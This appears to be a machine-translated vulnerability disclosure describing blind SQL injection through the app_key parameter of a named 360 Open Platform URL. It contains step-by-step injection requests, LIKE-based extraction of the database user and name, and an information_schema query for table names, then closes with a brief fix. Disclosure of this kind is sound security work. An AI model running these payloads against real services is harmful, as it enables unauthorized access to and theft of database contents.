360 injection caused by unfiltered file parameters on the application Open Platform

The defects are as follows: http://open.se.360.cn/static/js/patch.php?app_key= [Injection point] test: 1. 1 = 1 and 1 = 2 http://open.se.360.cn/static/js/patch.php?app_key= 1 '% 20and % 20 (1 = 1) % 20and % 20 '1' = '1 http://open.se.360.cn/static/js/patch.php?app_key= 1 '% 20and % 20 (1 = 2) % 20and % 20 '1' = '1 returned content is inconsistent. The former is: var ua_360 = false; var server_data = []; the latter is: var ua_360 = false; var server_data = [.... A bunch of content...]; 2. determine the user length. http://open.se.360.cn/static/js/patch.php?app_key= 1' % 20and % 20 (length (user () % 3E22) % 20and % 20 '1' = '1 3. however, when you want to further obtain the content, call some functions, such as substring, left, and right. The status is var ua_360 = false; var server_data = the content is no longer available. 4. As a result, it seems that some security measures have been implemented to filter out some functions? You can get the following content in another way: http://open.se.360.cn/static/js/patch.php?app_key= 1 '% 20and (user () like 'o %') and % 20 '1' = '1 return var ua_360 = false; var server_data = []; the first letter of the user name is o, and so on. You can get the user OPEN_SE @ 220. ***. ***. 186 Database Name: OPEN_SE_360_CN 5. to get the table name, write a program and run it. http://open.se.360.cn/static/js/patch.php?app_key= 1 '% 20and % 20 (select/**/group_concat (table_name)/**/from % 20information_schema.tables) % 20 like % 20' % CHARACTER_SETS [content to be run]') % 20and % 20 '1' = '1. The result is as follows: EXTENSIONEXTENSION_ENABLEDEXTENSION_LATESTLOG_2012...Solution:Filter the app_key parameter.